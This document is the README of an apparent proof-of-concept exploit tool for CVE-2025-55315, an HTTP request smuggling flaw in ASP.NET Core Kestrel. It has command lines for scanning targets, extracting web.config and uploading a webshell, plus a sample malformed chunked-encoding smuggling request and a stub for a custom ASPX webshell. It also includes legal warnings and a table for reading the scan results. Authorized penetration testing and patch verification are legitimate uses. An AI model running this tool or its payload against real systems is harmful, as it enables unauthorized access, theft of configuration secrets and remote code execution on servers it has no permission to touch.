CVE-2025-55315 PoC Exploit# CVE-2025-55315 Pentest Tool
**HTTP Request Smuggling Exploitation Tool for ASP.NET Core Kestrel**
[](https://www.python.org/downloads/)
[](https://nvd.nist.gov/vuln/detail/CVE-2025-55315)
[](https://nvd.nist.gov/vuln/detail/CVE-2025-55315)
[](#)
---
## ⚠️ LEGAL WARNING
**THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY!**
- Use ONLY on systems you own or have explicit written authorization to test
- Unauthorized access to computer systems is **ILLEGAL**
- Tool creator is NOT responsible for misuse
- By using this tool, you accept full legal responsibility
---
## 📋 Overview
Professional penetration testing tool for **CVE-2025-55315** (ASP.NET Core Kestrel HTTP Request Smuggling vulnerability). This tool is designed for single-target analysis with comprehensive exploitation capabilities.
### What is CVE-2025-55315?
A **critical** HTTP Request Smuggling vulnerability in ASP.NET Core Kestrel web server (CVSS 9.9/10) that allows attackers to:
- Bypass authentication
- Steal credentials and session tokens
- Perform Server-Side Request Forgery (SSRF)
- Poison caches
- Upload webshells and gain remote code execution
**Affected Versions:**
- .NET Core 3.0 through .NET 9.0.9
- Fixed in: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+
---
## ✨ Features
### Core Capabilities
- ✅ **Single Target Analysis** - Focused penetration testing on specific target
- ✅ **Automatic Endpoint Discovery** - Discovers common ASP.NET Core endpoints
- ✅ **Manual Endpoint Testing** - Test specific endpoints of interest
- ✅ **Vulnerability Detection** - Accurate CVE-2025-55315 detection
- ✅ **web.config Extraction** - Read configuration files via request smuggling
- ✅ **Webshell Upload** - Optional webshell deployment capability
- ✅ **Detailed Reporting** - JSON and text format reports
- ✅ **Safety Features** - Multiple confirmation prompts for destructive actions
### Technical Features
- HTTP/1.1 and HTTPS support
- Custom port support
- Configurable timeouts
- Verbose debugging mode
- Color-coded terminal output
- SSL certificate validation bypass (for testing)
---
## 🔧 Installation
### Requirements
```bash
# Python 3.7 or higher
python3 --version
# No external dependencies - uses only standard library
```
### Download
```bash
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit
# Make executable
chmod +x cve_2025_55315_PoC.py
```
---
## 🚀 Quick Start
### Basic Vulnerability Scan
```bash
python3 cve_2025_55315_PoC.py -t target.com
```
This will:
1. Gather server information
2. Auto-discover active endpoints
3. Test each endpoint for CVE-2025-55315
4. Display results in terminal
### Test Specific Endpoint
```bash
python3 cve_2025_55315_PoC.py -t target.com -e /api/login
```
### Full Scan with web.config Extraction
```bash
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt
```
### Advanced: Full Exploitation (Authorized Only!)
```bash
python3 cve_2025_55315_PoC.py \
-t target.com \
--read-config \
--upload-shell \
-v \
-o full_report.txt
```
---
## 📖 Usage Examples
### Example 1: Quick Check
**Scenario:** Check if production server is vulnerable
```bash
python3 cve_2025_55315_PoC.py -t api.mycompany.com
```
**Expected Duration:** 30-60 seconds
---
### Example 2: Detailed Scan
**Scenario:** Comprehensive endpoint scan with verbose output
```bash
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt
```
**Expected Duration:** 2-5 minutes
---
### Example 3: Target Multiple Endpoints
**Scenario:** Test specific critical endpoints
```bash
python3 cve_2025_55315_PoC.py \
-t api.mycompany.com \
-e /api/payment/process \
-e /api/admin/users \
-e /api/internal/config \
-o critical_endpoints.txt
```
---
### Example 4: Non-SSL Target
**Scenario:** Test internal HTTP server
```bash
python3 cve_2025_55315_PoC.py \
-t internal-api.local \
-p 8080 \
--no-ssl
```
---
## 📊 Command-Line Options
```
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
[--no-ssl] [--read-config] [--upload-shell]
[-o OUTPUT] [-v] [--timeout TIMEOUT]
Required Arguments:
-t, --target Target hostname or URL (e.g., target.com)
Optional Arguments:
-p, --port Port number (default: 443 for SSL, 80 for non-SSL)
-e, --endpoint Specific endpoint(s) to test (can be used multiple times)
--no-ssl Disable SSL/HTTPS (use HTTP)
--read-config Attempt to read web.config file
--upload-shell Attempt webshell upload (requires confirmation)
-o, --output Save report to file
-v, --verbose Enable verbose output
--timeout Socket timeout in seconds (default: 10)
-h, --help Show help message
```
---
## 🔍 Understanding the Output
### Vulnerable System Example
```
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL
--- Server Information ---
server: Kestrel/8.0.15
kestrel_detected: True
http_version: 1.1
--- VULNERABLE ENDPOINTS (2) ---
✗ /api/login
Details: Request smuggling successful - multiple responses
✗ /api/health
Details: Request smuggling successful - multiple responses
--- SUCCESSFUL EXPLOITS ---
✓ web.config_read via /api/login
```
**Interpretation:**
- 🔴 **CRITICAL VULNERABILITY DETECTED**
- 🔴 Multiple endpoints are vulnerable
- 🔴 Configuration file was successfully extracted
- ⚡ **URGENT:** Update to .NET 8.0.21+ or 9.0.10+
---
### Secure System Example
```
Target: new-api.company.com:443
Vulnerable: NO - SECURE
--- Server Information ---
server: Kestrel/9.0.10
kestrel_detected: True
http_version: 1.1
[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)
✓ No vulnerable endpoints found - target may be patched
```
**Interpretation:**
- ✅ **SYSTEM IS SECURE**
- ✅ Running patched Kestrel version
- ✅ All malformed requests rejected
---
## 🛡️ Safety and Ethics
### Authorization Checklist
Before running this tool, ensure:
- [ ] You own the target system, OR
- [ ] You have **written** authorization to test, AND
- [ ] Security team has been notified, AND
- [ ] You have a rollback plan, AND
- [ ] You understand the legal implications
### Built-in Safety Features
1. **Two-stage confirmation** - Tool asks for authorization before starting
2. **Webshell upload confirmation** - Requires typing "YES" in capitals
3. **Rate limiting** - Delays between requests during auto-discovery
4. **Timeout protection** - Prevents hanging connections
5. **Detailed logging** - All actions are logged for audit trail
---
## 🔬 Technical Details
### Exploitation Technique
The tool exploits CVE-2025-55315 using malformed chunked transfer encoding:
```http
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
2;\n ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1 ← This becomes a separate request
Host: target.com
```
**Why This Works:**
1. **Proxy server** sees `\n` as line terminator → processes as single request
2. **Kestrel (vulnerable)** ignores `\n` → treats smuggled GET as separate request
3. Smuggled request may execute in another user's session context
### Detection Logic
| Server Response | Interpretation | Status |
|----------------|----------------|---------|
| `400 Bad Request` | Kestrel rejected malformed chunk | ✅ Secure (patched) |
| Multiple `HTTP/1.1` | Two separate responses received | ❌ Vulnerable |
| `500` or `502` | Internal server error | ⚠️ Likely vulnerable |
| Normal `200 OK` | Request accepted | ⚠️ Inconclusive |
---
## 🐛 Troubleshooting
### Connection Failed
```
[ERROR] Connection failed: [Errno 111] Connection refused
```
**Solutions:**
- Verify target is reachable: `ping target.com`
- Check port number is correct
- Try with/without SSL: `--no-ssl`
- Check firewall rules
---
### SSL Certificate Error
```
[ERROR] Connection failed: certificate verify failed
```
**Solution:**
Tool already disables certificate verification. If issue persists:
```bash
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com
```
---
### Timeout Errors
```
[WARNING] No response - possible timeout
```
**Solutions:**
- Increase timeout: `--timeout 30`
- Check network connectivity
- Target may be slow or overloaded
---
### Upload Blocked
```
[WARNING] Upload blocked (forbidden/method not allowed)
```
**Explanation:**
- Server configuration blocks PUT/POST methods
- WAF/IPS is blocking the upload
- File permissions prevent writes
This is normal - not all vulnerable systems allow file upload.
---
## 📚 References
### CVE-2025-55315 Resources
1. **Microsoft Security Advisory:**
https://github.com/dotnet/aspnetcore/issues/64033
2. **NVD Database:**
https://nvd.nist.gov/vuln/detail/CVE-2025-55315
3. **Praetorian Research ($10k Bug Bounty):**
https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/
4. **Andrew Lock's Technical Analysis:**
https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/
### HTTP Request Smuggling
5. **PortSwigger Research:**
https://portswigger.net/web-security/request-smuggling
6. **OWASP:**
https://owasp.org/www-community/attacks/HTTP_Request_Smuggling
---
## 🔄 Customization
### Add Custom Endpoints
Edit `COMMON_ENDPOINTS` in the script:
```python
COMMON_ENDPOINTS = [
'/your/custom/endpoint',
'/api/myapp/admin',
# Add your endpoints here
]
```
### Use Custom Webshell
Modify the `upload_webshell()` method:
```python
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
shell_content: str = None):
if not shell_content:
shell_content = '''
<!-- Your custom ASPX webshell here -->
'''
```
---
## 📝 Reporting Issues
If you find bugs or have suggestions:
1. Run with verbose mode: `-v`
2. Save full output: `-o debug.txt`
3. Include:
- Python version
- Command used
- Error message
- Expected vs actual behavior
---
## ⚖️ Legal Disclaimer
```
THIS TOOL IS PROVIDED "AS IS" FOR EDUCATIONAL AND AUTHORIZED
SECURITY TESTING PURPOSES ONLY.
THE AUTHOR(S):
❌ Do NOT endorse illegal activities
❌ Are NOT responsible for misuse
❌ Are NOT liable for any damages
❌ Do NOT provide legal advice
BY USING THIS TOOL YOU AGREE:
✅ To use only on authorized systems
✅ To accept full legal responsibility
✅ To comply with all applicable laws
✅ To follow ethical hacking principles
UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!
```
---
## 🎓 Educational Purpose
This tool was created for:
- Security researchers
- Penetration testers
- Bug bounty hunters
- System administrators
- Security awareness training
- Authorized security assessments
**NOT for:**
- Malicious attacks
- Unauthorized access
- Competitive reconnaissance
- Any illegal activities
---
## 🙏 Acknowledgments
- **Microsoft Security Response Center** - For CVE disclosure and patches
- **Praetorian Security** - For original vulnerability research
- **Andrew Lock** - For detailed technical analysis
- **Security community** - For responsible disclosure practices
---
## 📄 License
**Educational and Authorized Security Testing Only**
This tool is provided for educational purposes and authorized security testing. Commercial use, redistribution, or use for malicious purposes is strictly prohibited.
---
## 🔐 Final Warning
```
╔═════════════════════════════════════════════════════════════╗
║ ║
║ USE THIS TOOL RESPONSIBLY AND LEGALLY! ║
║ ║
║ Unauthorized access to computer systems is a CRIME. ║
║ Always obtain written permission before testing. ║
║ Follow responsible disclosure practices. ║
║ ║
║ Happy (Legal) Hacking! ║
║ ║
╚═════════════════════════════════════════════════════════════╝
```
---
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view